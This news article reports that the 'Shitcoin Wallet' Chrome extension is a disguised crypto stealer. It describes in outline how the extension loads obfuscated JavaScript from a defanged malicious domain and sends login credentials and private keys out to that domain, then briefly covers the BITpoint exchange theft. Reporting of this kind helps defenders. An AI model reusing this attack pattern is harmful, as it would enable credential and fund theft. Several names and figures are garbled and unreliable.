Recently launched Google Chrome extension – Shitcoin Wallet, is not a crypto wallet but a well disguised crypto stealer informed Harry Denley, Director of Security at the MyCrypto platform. According to Henry, this crypto wallet is injecting a JavaScript (JS) code on the victim’s web pages that intends to steal passwords and private keys from cryptocurrency wallets.
What is Shitcoin Wallet?
As described in the introductory blogpost and its official website, Shitcoin Wallet is an Ethereum wallet that lets user connect to the Ethereum blockchain. It not only provides users the means for managing, transferring and receiving their Ethers (cryptocurrency) but also allows them to interact with thousands of ERC20 tokens that thrive on the Ethereum blockchain.
Why is it threatening?
Denley says the extension is threatening in two ways. Firstly, any Ethereum (ETH) coins and ERC0-based tokens managed within the extension are at risk since the extension sends the private keys of all wallets created or managed through its interface to a third-party website, erc20wallet.tk Secondly, this extension injects a malicious JS code when users navigate to certain popular cryptocurrency management platforms. The JS steals login credentials and private keys and sends the data to the same erc20wallet.tk website.
How does it happen?
As per ZDNet’s Shitcoin behavior analysis, the process of injecting the malicious code is as follows:
- Users install the Chrome extension
- Chrome extension requests permission to inject JavaScript code on 77 websites (listed here)
- When users navigate to any of these 77 websites, the extension loads and injects an additional JS file from: https://erc20wallet[.]tk/js/content_.js
- This JS file contains obfuscated code
- The code activates on five websites: com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange
- Once activated, the malicious JS code records the user’s login credentials, searches for private keys stored inside the dashboards of the five services, and, finally, sends the data to tk
What seems to be alarming though, is the fact that virus scanning engines have not been able to detect this malicious code and shows both the 32-bit and 64-bit installer files on Shitcoin wallet’s official website as clean and legit.
Cryptocurrency and its associated exchanges have been constantly under the attack from hackers in recent years. One such example is BITpoint, a Japan-based cryptocurrency exchange. It discovered an unauthorized withdrawal of $32 million from its hot wallet. The incident came to light when BITpoint tried to make a payment using the cryptocurrency Ripple and got an error message.
BITpoint held five cryptocurrencies in its hot wallet–Bitcoin, Bitcoin Cash, Ethereum, Litecoin, and Ripple. However, the company clarified that its cold wallet and cash holdings were not affected in the incident. BITpoint had halted all the payments In and Out of the exchange temporarily, “to prevent any harm to customer assets.”